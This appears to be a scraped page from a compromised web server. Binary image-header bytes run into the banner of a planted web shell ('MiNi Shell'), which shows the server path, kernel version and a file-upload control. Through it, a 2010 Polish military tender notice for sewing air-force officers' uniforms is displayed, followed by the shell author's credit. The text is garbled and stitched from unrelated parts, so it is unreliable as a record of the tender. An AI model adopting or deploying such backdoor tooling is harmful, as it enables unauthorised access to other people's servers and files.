JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100521/139792-N-2010.html

<p class="kh_header"><b>Dęblin: Usługę szycia odzieży mundurowej  typu wyjściowego wg określonych wzorów dla żołnierzy zawodowych i kandydatów dla żołnierzy zawodowych - 14/10/N</b><br>
<b>Numer ogłoszenia: 139792 - 2010; data zamieszczenia: 21.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4219 , 08-521 Dęblin, woj. lubelskie, tel. 0-81 5519510, 5517818, faks 0-81 5519536.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsosp.deblin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługę szycia odzieży mundurowej  typu wyjściowego wg określonych wzorów dla żołnierzy zawodowych i kandydatów dla żołnierzy zawodowych - 14/10/N.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa szycia odzieży mundurowej  typu wyjściowego wg określonych wzorów dla żołnierzy zawodowych i kandydatów dla żołnierzy zawodowych. Szczegółowy przedmiot zamówienia wraz z terminem realizacji poszczególnych dostaw został określony poniżej oraz w załączniku Nr 1 i 2 do SIWZ.
Lp.	Nazwa przedmiotu zamówienia	Jm	 Nr WDTT	Ilość
1	Bluza olimpijka oficerska damska wojsk lotniczych wz. 92 	szt	116/D/MON	59
2	Spodnie wyjściowe oficerskie damskie wojsk lotniczych wz. 92	szt	140/MON	89
3	Mundur wyjściowy oficerski damski Wojsk Lotniczych wz. 92 ze spódnicą	kpl	136/MON	58
4	Mundur wyjściowy oficerski damski Wojsk Lotniczych wz. 92 ze spodniami	kpl	136/MON	43
5	Spódnica wyjściowe oficerskie wojsk lotniczych wz. 92	szt	136/MON	2
6	Spódnica letnia oficerska wojsk lotniczych wz. 92	szt	136/MON	32
7	Mundur letni oficerski damski wojsk lotniczych wz. 92 ze spódnicą	kpl	136/MON	43
8	Spodnie letnie oficerskie damskie wojsk lotniczych wz. 92	szt	140/MON	43
9	Płaszcz letni oficerski damski wojsk lotniczych z podpinką	kpl	214/D/MON	43
10	Płaszcz sukienny oficerski damski wojsk lotniczych	szt	201/D MON	43
11	Koszula oficerska damska koloru stalowego	szt	303/D/MON	74
12	Koszula oficerska damska koloru białego	szt	303/D/MON	43
13	Koszulo-bluza oficerska damska z krótkimi rękawami koloru białego (z naramiennikami)	szt	301/D/MON	43
14	Koszulo-bluza oficerska damska z krótkimi rękawami koloru stalowego (z naramiennikami).	szt	301/D/MON	117
15	Koszulo-bluza oficerska damska z długimi rękawami koloru stalowego (z naramiennikami).	szt	310/D/MON	82
16	Koszulo-bluza oficerska damska z długimi rękawami koloru białego (z naramiennikami).	szt	310/D/MON	46
17	Bluza olimpijka oficerska wojsk lotniczych wz.92	szt	116/MON	2
18	Spodnie wyjściowe oficerskie wojsk lotniczych wz. 92	szt	102/MON	1
19	Mundur wyjściowy oficerski wojsk lotniczych wz. 92 	kpl	102/MON	5
20	Mundur letni oficerski wojsk lotniczych wz. 92 	kpl	103B/MON	3
21	Spodnie letnie oficerskie wojsk lotniczych wz. 92	szt	103B/MON	1
22	Płaszcz sukienny oficerski wojsk lotniczych	szt	201A/MON	2
23	Płaszcz sukienny oficerski wojsk lotniczych KRWP	szt	208/MON	55
24	Mundur służbowy oficerski wojsk lotniczych ze spodniami do butów KRWP wz. 92	szt	105/A/MON	17
25	Mundur służbowy oficerski wojsk lotniczych wz. 92	kpl	105/MON	85
26	Mundur wyjściowy oficerski wojsk lądowych wz. 92	kpl	101/MON	1
27	Mundur wyjściowy oficerski wojsk lądowych wz. 92	kpl	103A/MON	1

2.	Ilości przedmiotu zamówienia w poszczególnych zadaniach (etapach od E.1. do E.8.) realizacji określono szczegółowo w specyfikacji przedmiotu zamówienia w załączniku nr 1 do niniejszego wniosku.
3.	Sposób realizacji zamówienia - częściowo w określonych etapach zgodnie ze specyfikacją przedmiotu zamówienia w załączniku nr 1 do SIWZ.
4.	Zamówienie będzie realizowane w siedzibie Wykonawcy, natomiast wszelkie czynności wstępne takie jak pomiary antropometryczne lub przymiarki na terenie JW 4219, Wyższej Szkoły Oficerskiej Sił Powietrznych i Szkoły Podoficerskiej Sił Powietrznych w Dęblinie.
5.	Terminy wykonania pomiarów antropometrycznych i przymiarek określono dla realizacji danego etapu w załączniku nr 1 do SIWZ.
6.	Wykonawca na własny koszt przed wykonaniem usługi zobowiązany jest do pobrania wymiarów antropometrycznych od żołnierzy na terenie JW 4219, (Szkoły Podoficerskiej Sił Powietrznych, Wyższej Szkoły Oficerskiej Sił Powietrznych) w Dęblinie na podstawie, których zrealizuje przedmiot zamówienia. 
7.	Szczegółowy termin zostanie określony w kontaktach roboczych pisemnie, telefonicznie lub faksem pomiędzy przedstawicielem Zamawiającego- Szefem Służby Mundurowej JW 4219 (tel. 081 5518-874, 081 5517-899, faks: 81 55 18 603) a przedstawicielem Wykonawcy na 2 dni przed planowanym dniem pobrania wymiarów.
8.	Wykonawca po pobraniu wymiarów antropometrycznych zobowiązany jest 1 egzemplarz dokumentacji rozmiarowej przekazać przedstawicielowi Służby Mundurowej JW 4219.
9.	Podczas pobierania wymiarów antropometrycznych lub 5 dni po tym terminie  zamawiający zastrzega sobie prawo dokonania zmian dotyczących rodzaju umundurowania w zależności od rodzaju Sił Zbrojnych. Zmiany będą dotyczyły wyłącznie koloru umundurowania (kolor mundurów, płaszczy i koszul) - obowiązujące w Siłach Powietrznych (kolor stalowy) obowiązujące w Wojskach Lądowych (kolor khaki), lub obowiązujące w Marynarce Wojennej (kolor czarny)
10.	Wykonawca zobowiązany jest na własny koszt dostarczyć uszyte umundurowanie pod wskazany adres zgodnie z terminem dostaw określonym w załączniku nr 1 do SIWZ: 08-521 Dęblin, JW 4219, ul. Lotnisko 205 - magazyn mundurowy budynek nr 64. Tel. (081) 5517-901, (081) 5518-803.
11.	Przedmioty zamówienia powinny zostać opisane lub oznaczone (np. imię i nazwisko lub numer) na opakowaniu jednostkowym  przez wykonawcę w sposób pozwalający na łatwe przyporządkowanie danego przedmiotu do osoby dla której zostało wykonane na podstawie dokumentacji rozmiarowej, która została przekazana przedstawicielowi Służby Mundurowej JW 4219 po pobraniu wymiarów antropometrycznych. 
12.	Każda partia przedmiotu umowy, przed jej ekspedycją do Zamawiającego, będzie zgłoszona przez Wykonawcę do Odbioru Wojskowego. 
13.	Odbioru Wojskowego dokona przedstawiciel 74 Rejonowego Przedstawicielstwa Wojskowego w ciągu 7 dni od daty powiadomienia przez Wykonawcę o gotowości przedmiotu umowy do odbioru (ul. Legionów 83, 91-072 Łódź, Tel. 042 7504165). Odbiór Wojskowy prowadzony będzie w miejscu określonym przez Wykonawcę na terenie Rzeczypospolitej Polskiej.
14.	Odbiór wojskowy będzie prowadzony w oparciu o WOJSKOWĄ DOKUMENTACJĘ TECHNICZNO TECHNOLOGICZNĄ dotyczącą danego przedmiotu zamówienia oraz potwierdzony za zgodność przez WOJSKOWY OŚRODEK BADAWCZO WDROŻENIOWY SŁUŻBY MUNDUROWEJ zakładowy wzór przedmiotów zaopatrzenia mundurowego aktualny na 2010 rok.
15.	Przyjęcie umundurowania przez Zamawiającego odbywać się będzie w dniach od poniedziałku do piątku w godz. 8.00-13.00 zgodnie z terminem realizacji zamówienia po przekazaniu z 2 dniowym wyprzedzeniem informacji telefonicznej I faksem Szefowi Służby Mundurowej JW 4219 informacji o terminie dostawy (tel. 081 5518-874, faksem 81 551 86 05). Zmiana godzin dostawy wymaga uzgodnienia z Odbiorcą. Ewentualne koszty związane z koniecznością przyjęcia poza wyznaczonymi dniami i godzinami obciążają wykonawcę.
16.	Wykonawca ponosi odpowiedzialność za jakość wyrobów, w tym również materiałów, elementów dostarczonych przez kooperantów lub podwykonawców. 
17.	Przedmiot umowy podlega ocenie zgodności wyrobu na potrzeby Obronności i Bezpieczeństwa w trybie pierwszym oceny zgodności wg zasad określonych w art. 7 ustawy z dnia 17 listopada 2006r. o systemie oceny zgodności wyrobów przeznaczonych na potrzeby obronności i bezpieczeństwa państwa (Dz. U. Nr 235 poz.1700).
18.	Zamawiający zastrzega sobie prawo zmniejszenia ilości umundurowania przeznaczonego do uszycia będącego przedmiotem zamówienia z przyczyn niezależnych od Zamawiającego, których nie można było przewidzieć mimo dochowania należytej staranności przy ustalaniu potrzeb. Wykonawcy nie będą przysługiwały z tego tytułu żadne roszczenia finansowe wobec Zamawiającego. W przypadku dokonania konieczności zmniejszenia zamówienia przeprowadzone to zostanie w formie pisemnej. Zapłata nastąpi za faktycznie  wykonane umundurowanie.  
19.	Wykonawca udziela 36 miesięcznej gwarancji na wykonane umundurowanie. Gwarancja biegnie od daty odbioru przedmiotu umowy.
20.	W uzasadnionych przypadkach dopuszcza się zwiększenie zamówienia do 20 % (kwoty zamówienia brutto (złożenie zamówienia dodatkowego na przedmioty zaopatrzenia mundurowego określone w przetargu, po cenach określonych w przetargu.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające obejmować będzie rozszerzenie wielkości zamówienia podstawowego do 20%.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.39.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią wykonawcy: posiadający aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycz?nych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wsosp.deblin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4219, Lotnisko bud. 205, pok. 2, 08-521 Dęblin. Pocztą po wpłacie 25,00 zł na konto 86101013390000971391500000. Pisemną prośbę należy przesłać łącznie z dowodem wpłaty..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2010 godzina 12:00, miejsce: Kancelaria Jawna (pok. nr 20) Jednostki Wojskowej 4219, Lotnisko, bud. 205, 08-521 Dęblin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com